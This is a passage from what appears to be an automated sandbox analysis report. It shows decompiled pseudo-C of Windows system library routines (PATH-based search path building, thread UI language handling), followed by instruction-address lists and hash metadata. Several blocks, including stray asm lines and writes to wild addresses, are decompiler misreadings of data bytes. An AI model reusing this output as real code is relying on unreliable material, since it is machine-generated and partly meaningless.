						goto L32;
					} else {
						_t334 = L02B14620(_t287,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t277);
						_v52 = _t334;
						__eflags = _t334;
						if(_t334 == 0) {
							_t335 = 0xc0000017;
							goto L32;
						} else {
							 *(_t334 + 0x44) =  *(_t334 + 0x44) & 0x00000000;
							_t50 = _t334 + 0x48; // 0x48
							_t329 = _t50;
							_t308 = _v32;
							 *(_t334 + 0x3c) = _t277;
							_t279 = 0;
							 *((short*)(_t334 + 0x30)) = _v48;
							__eflags = _t308;
							if(_t308 != 0) {
								 *(_t334 + 0x18) = _t329;
								__eflags = _t308 - 0x2be8478;
								 *_t334 = ((0 | _t308 == 0x02be8478) - 0x00000001 & 0xfffffffb) + 7;
								E02B3F3E0(_t329,  *((intOrPtr*)(_t308 + 4)),  *_t308 & 0x0000ffff);
								_t308 = _v32;
								_t343 = _t343 + 0xc;
								_t279 = 1;
								__eflags = _a8;
								_t329 = _t329 + (( *_t308 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t271 = E02B839F2(_t329);
									_t308 = _v32;
									_t329 = _t271;
								}
							}
							_t291 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t335 = _v68;
								__eflags = 0;
								 *((short*)(_t329 - 2)) = 0;
								goto L32;
							} else {
								_t277 = _t334 + _t279 * 4;
								_v56 = _t277;
								do {
									__eflags = _t308;
									if(_t308 != 0) {
										_t237 =  *(_v60 + _t291 * 4);
										__eflags = _t237;
										if(_t237 == 0) {
											goto L30;
										} else {
											__eflags = _t237 == 5;
											if(_t237 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t277 =  *(_v60 + _t291 * 4);
										 *(_t277 + 0x18) = _t329;
										_t241 =  *(_v60 + _t291 * 4);
										__eflags = _t241 - 8;
										if(_t241 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t241 * 4 +  &M02B22959))) {
												case 0:
													__ax =  *0x2be8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E02B3F3E0(__edi,  *0x2be848c, __ax & 0x0000ffff);
														__eax =  *0x2be8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E02B3F3E0(_t329, _v80, _v64);
													_t266 = _v64;
													goto L26;
												case 2:
													 *0x2be8480 & 0x0000ffff = E02B3F3E0(__edi,  *0x2be8484,  *0x2be8480 & 0x0000ffff);
													__eax =  *0x2be8480 & 0x0000ffff;
													__eax = ( *0x2be8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E02B3F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E02B3F3E0(_t329, _v76, _v36);
														_t266 = _v36;
													}
													L26:
													_t343 = _t343 + 0xc;
													_t329 = _t329 + (_t266 >> 1) * 2 + 2;
													__eflags = _t329;
													L27:
													_push(0x3b);
													_pop(_t268);
													 *((short*)(_t329 - 2)) = _t268;
													goto L28;
												case 6:
													__ebx =  *0x2be575c;
													__eflags = __ebx - 0x2be575c;
													if(__ebx != 0x2be575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E02B3F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x2be575c;
														} while (__ebx != 0x2be575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x2be8478 & 0x0000ffff = E02B3F3E0(__edi,  *0x2be847c,  *0x2be8478 & 0x0000ffff);
													__eax =  *0x2be8478 & 0x0000ffff;
													__eax = ( *0x2be8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E02B839F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x2be6e58 & 0x0000ffff = E02B3F3E0(__edi,  *0x2be6e5c,  *0x2be6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x2be6e58 & 0x0000ffff;
													__eax = ( *0x2be6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t291 = _v16;
													_t308 = _v32;
													L29:
													_t277 = _t277 + 4;
													__eflags = _t277;
													_v56 = _t277;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t291 = _t291 + 1;
									_v16 = _t291;
									__eflags = _t291 - _v48;
								} while (_t291 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t241 =  *(_v60 + _t327 * 4);
						if(_t241 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t241 * 4 +  &M02B22935))) {
							case 0:
								__ax =  *0x2be8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t308 =  &_v64;
								_v80 = E02B22E3E(0,  &_v64);
								_t277 = _t277 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x2be8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x2be8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E02B0EEF0(0x2be79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E02B0EB70(__ecx, 0x2be79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t215 = _v72;
											__eflags = _t215;
											if(_t215 != 0) {
												L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
											}
											_t216 = _v52;
											__eflags = _t216;
											if(_t216 != 0) {
												__eflags = _t335;
												if(_t335 < 0) {
													L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
													_t216 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t287 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x2be7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L02B14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E02B0EB70(__ecx, 0x2be79a0);
										__eax = _v52;
										L36:
										_pop(_t328);
										_pop(_t336);
										__eflags = _v8 ^ _t340;
										_pop(_t278);
										return E02B3B640(_t216, _t278, _v8 ^ _t340, _t308, _t328, _t336);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t273 = _v56;
								if(_v56 != 0) {
									_t308 =  &_v36;
									_t275 = E02B22E3E(_t273,  &_v36);
									_t287 = _v36;
									_v76 = _t275;
								}
								if(_t287 == 0) {
									goto L44;
								} else {
									_t277 = _t277 + 2 + _t287;
								}
								goto L14;
							case 6:
								__eax =  *0x2be5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x2be8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x2be8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x2be6e58 & 0x0000ffff;
								__eax = ( *0x2be6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t327 = _t327 + 1;
								if(_t327 >= _v48) {
									goto L16;
								} else {
									_t308 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("o16 sub [edx-0x4dd81ffe], dh");
					_t337 = _t334 + 1;
					 *0xFFFFFFFFB2260504 =  *((intOrPtr*)(0xffffffffb2260504)) - 2;
					_t282 = 0x25;
					_t345 = _t241;
					 *0xFFFFFFFFB65B3504 =  *((intOrPtr*)(0xffffffffb65b3504)) - 2;
					 *0xFFFFFFFFB2288004 =  *((intOrPtr*)(0xffffffffb2288004)) - _t334 + 1;
					asm("daa");
					_push(ds);
					 *0xFFFFFFFFB2284E04 =  *((intOrPtr*)(0xffffffffb2284e04)) - 2;
					_t283 = _t282 + _a35;
					asm("fcomp dword [ebx-0x4a]");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x2bcff00);
					E02B4D08C(_t283, _t329, _t337);
					_v44 =  *[fs:0x18];
					_t330 = 0;
					 *_a24 = 0;
					_t284 = _a12;
					__eflags = _t284;
					if(_t284 == 0) {
						_t246 = 0xc0000100;
					} else {
						_v8 = 0;
						_t338 = 0xc0000100;
						_v52 = 0xc0000100;
						_t248 = 4;
						while(1) {
							_v40 = _t248;
							__eflags = _t248;
							if(_t248 == 0) {
								break;
							}
							_t298 = _t248 * 0xc;
							_v48 = _t298;
							__eflags = _t284 -  *((intOrPtr*)(_t298 + 0x2ad1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t263 = E02B3E5C0(_a8,  *((intOrPtr*)(_t298 + 0x2ad1668)), _t284);
									_t345 = _t345 + 0xc;
									__eflags = _t263;
									if(__eflags == 0) {
										_t338 = E02B751BE(_t284,  *((intOrPtr*)(_v48 + 0x2ad166c)), _a16, _t330, _t338, __eflags, _a20, _a24);
										_v52 = _t338;
										break;
									} else {
										_t248 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t248 = _t248 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t338;
						__eflags = _t338;
						if(_t338 < 0) {
							__eflags = _t338 - 0xc0000100;
							if(_t338 == 0xc0000100) {
								_t294 = _a4;
								__eflags = _t294;
								if(_t294 != 0) {
									_v36 = _t294;
									__eflags =  *_t294 - _t330;
									if( *_t294 == _t330) {
										_t338 = 0xc0000100;
										goto L76;
									} else {
										_t318 =  *((intOrPtr*)(_v44 + 0x30));
										_t250 =  *((intOrPtr*)(_t318 + 0x10));
										__eflags =  *((intOrPtr*)(_t250 + 0x48)) - _t294;
										if( *((intOrPtr*)(_t250 + 0x48)) == _t294) {
											__eflags =  *(_t318 + 0x1c);
											if( *(_t318 + 0x1c) == 0) {
												L106:
												_t338 = E02B22AE4( &_v36, _a8, _t284, _a16, _a20, _a24);
												_v32 = _t338;
												__eflags = _t338 - 0xc0000100;
												if(_t338 != 0xc0000100) {
													goto L69;
												} else {
													_t330 = 1;
													_t294 = _v36;
													goto L75;
												}
											} else {
												_t253 = E02B06600( *(_t318 + 0x1c));
												__eflags = _t253;
												if(_t253 != 0) {
													goto L106;
												} else {
													_t294 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t338 = E02B22C50(_t294, _a8, _t284, _a16, _a20, _a24, _t330);
											L76:
											_v32 = _t338;
											goto L69;
										}
									}
									goto L108;
								} else {
									E02B0EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t338 = _a24;
									_t260 = E02B22AE4( &_v36, _a8, _t284, _a16, _a20, _t338);
									_v32 = _t260;
									__eflags = _t260 - 0xc0000100;
									if(_t260 == 0xc0000100) {
										_v32 = E02B22C50(_v36, _a8, _t284, _a16, _a20, _t338, 1);
									}
									_v8 = _t330;
									E02B22ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t246 = _t338;
					}
					L70:
					return E02B4D0D1(_t246);
				}
				L108:
			}



















































                        0x02b22584
                        0x02b22586
                        0x02b22590
                        0x02b22596
                        0x02b22597
                        0x02b22598
                        0x02b22599
                        0x02b2259e
                        0x02b225a4
                        0x02b225a9
                        0x02b225ac
                        0x02b225ae
                        0x02b225b1
                        0x02b225b2
                        0x02b225b5
                        0x02b225b8
                        0x02b225bb
                        0x02b225bc
                        0x02b225bf
                        0x02b225c2
                        0x02b225c5
                        0x02b225c6
                        0x02b225cb
                        0x02b225ce
                        0x02b225d8
                        0x02b225db
                        0x02b225dd
                        0x02b225de
                        0x02b225e1
                        0x02b225e3
                        0x02b225e9
                        0x02b226da
                        0x02b226da
                        0x02b226dd
                        0x02b226e2
                        0x02b65b56
                        0x00000000
                        0x02b226e8
                        0x02b226f9
                        0x02b226fb
                        0x02b226fe
                        0x02b22700
                        0x02b65b60
                        0x00000000
                        0x02b22706
                        0x02b22706
                        0x02b2270a
                        0x02b2270a
                        0x02b2270d
                        0x02b22713
                        0x02b22716
                        0x02b22718
                        0x02b2271c
                        0x02b2271e
                        0x02b65b6c
                        0x02b65b6f
                        0x02b65b7f
                        0x02b65b89
                        0x02b65b8e
                        0x02b65b93
                        0x02b65b96
                        0x02b65b9c
                        0x02b65ba0
                        0x02b65ba3
                        0x02b65bab
                        0x02b65bb0
                        0x02b65bb3
                        0x02b65bb3
                        0x02b65ba3
                        0x02b22724
                        0x02b22726
                        0x02b22729
                        0x02b2272c
                        0x02b2279d
                        0x02b2279d
                        0x02b227a0
                        0x02b227a2
                        0x00000000
                        0x02b2272e
                        0x02b2272e
                        0x02b22731
                        0x02b22734
                        0x02b22734
                        0x02b22736
                        0x02b65bc1
                        0x02b65bc1
                        0x02b65bc4
                        0x00000000
                        0x02b65bca
                        0x02b65bca
                        0x02b65bcd
                        0x00000000
                        0x02b65bd3
                        0x00000000
                        0x02b65bd3
                        0x02b65bcd
                        0x02b2273c
                        0x02b2273c
                        0x02b22742
                        0x02b22747
                        0x02b2274a
                        0x02b2274d
                        0x02b22750
                        0x00000000
                        0x02b22756
                        0x02b22756
                        0x00000000
                        0x02b22902
                        0x02b22908
                        0x02b2290b
                        0x00000000
                        0x02b22911
                        0x02b2291c
                        0x02b22921
                        0x00000000
                        0x02b22921
                        0x00000000
                        0x00000000
                        0x02b22880
                        0x02b22887
                        0x02b2288c
                        0x00000000
                        0x00000000
                        0x02b22805
                        0x02b2280a
                        0x02b22814
                        0x02b22816
                        0x00000000
                        0x00000000
                        0x02b2281e
                        0x02b22821
                        0x02b22823
                        0x00000000
                        0x02b22829
                        0x02b22829
                        0x02b22831
                        0x02b2283c
                        0x02b2283e
                        0x00000000
                        0x02b2283e
                        0x00000000
                        0x00000000
                        0x02b2284e
                        0x02b22850
                        0x02b22851
                        0x02b22854
                        0x02b22857
                        0x02b2285a
                        0x02b2285c
                        0x02b2285d
                        0x00000000
                        0x00000000
                        0x02b2275d
                        0x02b22761
                        0x00000000
                        0x02b22767
                        0x02b2276e
                        0x02b22773
                        0x02b22773
                        0x02b22776
                        0x02b22778
                        0x02b2277e
                        0x02b2277e
                        0x02b22781
                        0x02b22781
                        0x02b22783
                        0x02b22784
                        0x00000000
                        0x00000000
                        0x02b65bd8
                        0x02b65bde
                        0x02b65be4
                        0x02b65be6
                        0x02b65be8
                        0x02b65be9
                        0x02b65bee
                        0x02b65bf8
                        0x02b65bff
                        0x02b65c01
                        0x02b65c04
                        0x02b65c07
                        0x02b65c0b
                        0x02b65c0d
                        0x02b65c0d
                        0x02b65c15
                        0x02b65c18
                        0x02b65c1b
                        0x02b65c1b
                        0x02b65c1e
                        0x00000000
                        0x00000000
                        0x02b228c3
                        0x02b228c8
                        0x02b228d2
                        0x02b228d4
                        0x02b228d8
                        0x02b228db
                        0x02b65c26
                        0x02b65c28
                        0x02b65c2d
                        0x02b65c2d
                        0x00000000
                        0x00000000
                        0x02b65c34
                        0x02b65c36
                        0x02b65c49
                        0x02b65c4e
                        0x02b65c54
                        0x02b65c5b
                        0x02b65c5d
                        0x02b65c60
                        0x02b22788
                        0x02b22788
                        0x02b2278b
                        0x02b2278e
                        0x02b2278e
                        0x02b2278e
                        0x02b22791
                        0x00000000
                        0x00000000
                        0x02b22756
                        0x02b22750
                        0x00000000
                        0x02b22794
                        0x02b22794
                        0x02b22795
                        0x02b22798
                        0x02b22798
                        0x00000000
                        0x02b22734
                        0x02b2272c
                        0x02b22700
                        0x02b225ef
                        0x02b225ef
                        0x02b225ef
                        0x02b225f2
                        0x02b225f8
                        0x00000000
                        0x00000000
                        0x02b225fe
                        0x00000000
                        0x02b228e6
                        0x02b228ec
                        0x02b228ef
                        0x02b228f5
                        0x02b228f8
                        0x02b228f8
                        0x00000000
                        0x02b228f8
                        0x00000000
                        0x00000000
                        0x02b22866
                        0x02b22866
                        0x02b22876
                        0x02b22879
                        0x00000000
                        0x00000000
                        0x02b227e0
                        0x02b227e7
                        0x02b227e9
                        0x02b227eb
                        0x02b65afd
                        0x00000000
                        0x02b65afd
                        0x00000000
                        0x00000000
                        0x02b22633
                        0x02b22638
                        0x02b2263b
                        0x02b2263c
                        0x02b2263e
                        0x02b22640
                        0x02b22642
                        0x02b22647
                        0x02b22649
                        0x02b2264e
                        0x02b22650
                        0x02b22653
                        0x02b22659
                        0x02b226a2
                        0x02b226a7
                        0x02b226ac
                        0x02b226b2
                        0x02b65b11
                        0x02b65b15
                        0x02b65b17
                        0x00000000
                        0x02b226b8
                        0x02b226b8
                        0x02b226ba
                        0x02b227a6
                        0x02b227a6
                        0x02b227a9
                        0x02b227ab
                        0x02b227b9
                        0x02b227b9
                        0x02b227be
                        0x02b227c1
                        0x02b227c3
                        0x02b227c5
                        0x02b227c7
                        0x02b65c74
                        0x02b65c79
                        0x02b65c79
                        0x02b227c7
                        0x00000000
                        0x02b226c0
                        0x02b226c0
                        0x02b226c3
                        0x02b226c6
                        0x02b226c6
                        0x02b226c9
                        0x02b226c9
                        0x00000000
                        0x02b226c9
                        0x02b226ba
                        0x02b2265b
                        0x02b2265b
                        0x02b2265e
                        0x02b22667
                        0x02b2266d
                        0x02b22677
                        0x02b2267c
                        0x02b2267f
                        0x02b22681
                        0x02b65b49
                        0x02b65b4e
                        0x02b227cd
                        0x02b227d0
                        0x02b227d1
                        0x02b227d2
                        0x02b227d4
                        0x02b227dd
                        0x02b22687
                        0x02b22687
                        0x02b2268a
                        0x02b2268b
                        0x02b2268e
                        0x02b2268f
                        0x02b22691
                        0x02b22696
                        0x02b22698
                        0x02b2269d
                        0x02b2269f
                        0x00000000
                        0x02b2269f
                        0x02b22681
                        0x00000000
                        0x00000000
                        0x02b22846
                        0x00000000
                        0x00000000
                        0x02b22605
                        0x02b2260a
                        0x02b2260c
                        0x02b22611
                        0x02b22616
                        0x02b22619
                        0x02b22619
                        0x02b2261e
                        0x00000000
                        0x02b22624
                        0x02b22627
                        0x02b22627
                        0x00000000
                        0x00000000
                        0x02b65b1f
                        0x00000000
                        0x00000000
                        0x02b22894
                        0x02b2289b
                        0x02b2289d
                        0x02b228a1
                        0x02b65b2b
                        0x02b65b2e
                        0x02b65b2e
                        0x02b228a7
                        0x02b228a9
                        0x02b65b04
                        0x02b65b09
                        0x02b65b09
                        0x02b65b09
                        0x00000000
                        0x00000000
                        0x02b65b35
                        0x02b65b3c
                        0x02b228fb
                        0x02b228fb
                        0x02b226cc
                        0x02b226cc
                        0x02b226d0
                        0x00000000
                        0x02b226d2
                        0x02b226d2
                        0x00000000
                        0x02b226d2
                        0x00000000
                        0x00000000
                        0x02b225fe
                        0x02b2292d
                        0x02b22930
                        0x02b22935
                        0x02b22939
                        0x02b22945
                        0x02b22946
                        0x02b2294e
                        0x02b22951
                        0x02b22952
                        0x02b2295a
                        0x02b22962
                        0x02b22965
                        0x02b22966
                        0x02b2296c
                        0x02b22971
                        0x02b2297d
                        0x02b2297e
                        0x02b2297f
                        0x02b22980
                        0x02b22981
                        0x02b22982
                        0x02b22983
                        0x02b22984
                        0x02b22985
                        0x02b22986
                        0x02b22987
                        0x02b22988
                        0x02b22989
                        0x02b2298a
                        0x02b2298b
                        0x02b2298c
                        0x02b2298d
                        0x02b2298e
                        0x02b2298f
                        0x02b22990
                        0x02b22992
                        0x02b22997
                        0x02b229a3
                        0x02b229a6
                        0x02b229ab
                        0x02b229ad
                        0x02b229b0
                        0x02b229b2
                        0x02b65c80
                        0x02b229b8
                        0x02b229b8
                        0x02b229bb
                        0x02b229c0
                        0x02b229c5
                        0x02b229c6
                        0x02b229c6
                        0x02b229c9
                        0x02b229cb
                        0x00000000
                        0x00000000
                        0x02b229cd
                        0x02b229d0
                        0x02b229d9
                        0x02b229db
                        0x02b229dd
                        0x02b22a7f
                        0x02b22a84
                        0x02b22a87
                        0x02b22a89
                        0x02b65ca1
                        0x02b65ca3
                        0x00000000
                        0x02b22a8f
                        0x02b22a8f
                        0x00000000
                        0x02b22a8f
                        0x00000000
                        0x02b229e3
                        0x02b229e3
                        0x02b229e3
                        0x00000000
                        0x02b229e3
                        0x02b229dd
                        0x00000000
                        0x02b229db
                        0x02b229e6
                        0x02b229e9
                        0x02b229eb
                        0x02b229ed
                        0x02b229f3
                        0x02b229f5
                        0x02b229f8
                        0x02b229fa
                        0x02b22a97
                        0x02b22a9a
                        0x02b22a9d
                        0x02b22add
                        0x00000000
                        0x02b22a9f
                        0x02b22aa2
                        0x02b22aa5
                        0x02b22aa8
                        0x02b22aab
                        0x02b65cab
                        0x02b65caf
                        0x02b65cc5
                        0x02b65cda
                        0x02b65cdc
                        0x02b65cdf
                        0x02b65ce5
                        0x00000000
                        0x02b65ceb
                        0x02b65ced
                        0x02b65cee
                        0x00000000
                        0x02b65cee
                        0x02b65cb1
                        0x02b65cb4
                        0x02b65cb9
                        0x02b65cbb
                        0x00000000
                        0x02b65cbd
                        0x02b65cbd
                        0x00000000
                        0x02b65cbd
                        0x02b65cbb
                        0x02b22ab1
                        0x02b22ab1
                        0x02b22ac4
                        0x02b22ac6
                        0x02b22ac6
                        0x00000000
                        0x02b22ac6
                        0x02b22aab
                        0x00000000
                        0x02b22a00
                        0x02b22a09
                        0x02b22a0e
                        0x02b22a21
                        0x02b22a24
                        0x02b22a35
                        0x02b22a3a
                        0x02b22a3d
                        0x02b22a42
                        0x02b22a59
                        0x02b22a59
                        0x02b22a5c
                        0x02b22a5f
                        0x02b22a5f
                        0x02b229fa
                        0x02b229f3
                        0x02b22a64
                        0x02b22a64
                        0x02b22a6b
                        0x02b22a6b
                        0x02b22a6d
                        0x02b22a72
                        0x02b22a72
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: PATH
                        • API String ID: 0-1036084923
                        • Opcode ID: dc17bbac4f34a8bbe5b64c30c6e24fe5bdeb1138cecfb507a46446266dfc508f
                        • Instruction ID: b5f9a1405eb73c274267dd0c4e1bc6422e31c09e9d6d8430ab986797779d5d9a
                        • Opcode Fuzzy Hash: dc17bbac4f34a8bbe5b64c30c6e24fe5bdeb1138cecfb507a46446266dfc508f
                        • Instruction Fuzzy Hash: A2C18DB2D00229DBDB25DF98D880BBDB7B1FF48744F4844A9E905EB260D734AD55CB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B2FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                        Download Yara Rule
                        C-Code - Quality: 80%
                        			E02B2FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E02B0EEF0(0x2be7b60);
					_t134 =  *0x2be7b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x2be7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2be7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E02B06D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E02B076E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E02B98938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E02AFB150();
													}
													_t116 = E02B96D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E02B075CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x2be8638; // 0x0
																	_t122 = L02B038A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E02B076E2(_t154);
																			goto L41;
																		}
																	} else {
																		E02B076E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
